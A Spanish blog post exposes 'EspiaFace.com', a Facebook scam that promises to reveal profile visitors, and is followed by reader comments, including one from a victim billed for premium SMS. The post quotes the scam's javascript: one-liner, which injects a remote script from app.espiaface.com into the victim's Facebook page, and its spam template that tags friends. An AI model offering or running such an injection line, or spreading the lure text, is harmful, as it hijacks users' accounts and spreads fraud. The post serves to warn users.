Averigua quien visita tu perfil en Facebook es un fraude

Desde hace unos días se ha propagado en rápidamente en Facebook una supuesta manera de saber quien ha visitado tu perfil, el supuesto servicio viene un sitio fraudulento llamado EspiaFace.com, que aquí vamos a desenmascarar, pues cómo ya había comentado hace tiempo que todas las aplicaciones que te prometen saber quien ha visitado tu perfil en Facebook son una estafa esta nueva aplicación no es la excepción.

Viendo cómo funciona el servicio de EspiaFace.com te pide hacer una serie de cosas para supuestamente instalar el servicio en tu cuenta, para eso tienes que insertar un código en tu muro que tal vez muchos no entienden pero se trata de un simple JavaScript que toma de manera aleatoria algunos de tus amigos de tu cuenta y los coloca con un número de visitas ya predefinido.

El primero código que te pide insertar en la barra de direcciones es el siguiente:

javascript:(a=(b=document).createElement(\'script\')).src=\'//app.espiaface.com/app.js?\'+Math.random(),b.body.appendChild(a);void(0)

En el código anterior lo único que hace es agregar el script de espiaface.com a tu Facebook para poder sacar los nombres de tus amigos.

Después te pide compartir el sitio en tu Facebook, supuestamente para que funcione, esto es lo más bajo que he visto para engañar a un usuario, aquí el único objetivo es propagar el fraude.

Y si lo anterior no fue suficiente te pide llenar una encuesta con la que los dueños del servicio ganan dinero, de nuevo engañando al usuario y si no completas la encuesta no podrás terminar, así que todos los que han caido en el fraude han llenado la encuesta.

Finalmente nos pide publicar el siguiente código en nuestro Facebook:

var postmessage = \'Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!\';

En el código anterior lo que dice %tf% es donde se colocan de manera aleatoria nombre de tus amigos que se etiquetan en el mensaje, esto lo puedes comprobar haciendo varias veces el mismo procedimiento, donde siempre van a aparecer nombres diferentes y el mismo número de visitas.

Cómo puedes ver, si sabes algo de JavaScript, puedes ver que el supuesto servicio es un fraude total, y lo peor, es que miles de personas en Facebook creen que es verdad y están etiquetando a sus amigos para propagar el fraude.

Así que si tu también fuiste víctima de ser etiquetado por alguno de tus amigos como uno de los que más visitan su perfil cuando ni siquiera es verdad, comparte este este artículo con ellos para que no crean ese engaño.

Para compartir este artículo con tus amigos haz clic en el botón “Me gusta

Escríbe un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

38 comentarios en “Averigua quien visita tu perfil en Facebook es un fraude”

  1. Gracias por la info, gracias a dios que se algo de internet y a mi me olía mal eso de incluir un script en la barra de navegación, por alguna extraña razón preferí esperar a que alguien publicase este post.
    Asimismo otra cosa que me tiro “patras” fue el echo de que Youtube había eliminado el video explicativo

    Me faltaba este post para cerciorarme de que aquello era un timo como una casa

    Saludos

  2. graxx x la iinfO haztha ahOriitha ya me manDarOn como 25 mmDz D quiien vizitha thu perfiil pero lo buzQ ya Q pz ya llamO un pOko la atenciiOn y me dii cuentha D q lo Q dicez ez ciierthO aun ziin acerlo graxx***!!! =)

  3. hay gracias por la informacion ,, desde hace dias me estavan solicitudes de eventos de quein vi*ita tu eprfil y pss cuando intentraba abrir la pagina se caia ,,menosmal en un intento de abrirla encontre ete articulo ,, y ps devo recalcar , que lo que hace un codigo de javascript; puede causar daño web y para als personas que no lo saben tratar o no saben que es javascript ps esto no loes interesa ,,de todos modos muchas gracias

  4. Hola, caí en la trampa…
    Me pidieron el número de móvil y ahora no dejan de llegarme sms que me cobran a 1.20 cada uno.
    He llamado a la compañía telefónica y me han dicho que ellso no pueden hacer nada, porque no es un servicio que me proporcionen ellos.
    Alguién puede ayudarme? Como puedo darem de baja o lo que sea?
    Los mensajes me llegan como “Mensaje Push” y dentro em pone “descarga” y luego un enlace, cada vez uno. No em aparece ningún tipo de número ni nada.
    En la factura me aparece como “795600 Premium SMS”
    Por favor, estoy desesperada… me estan cobrando mucho dinero de algo que no se lo que es, ni nada.
    Gracias por la información que aportais. Si hubiese leido esto antes….
    Pero bueno supongo que me pasa por ignorante en todo este mundo.
    Gracias por ayudarme!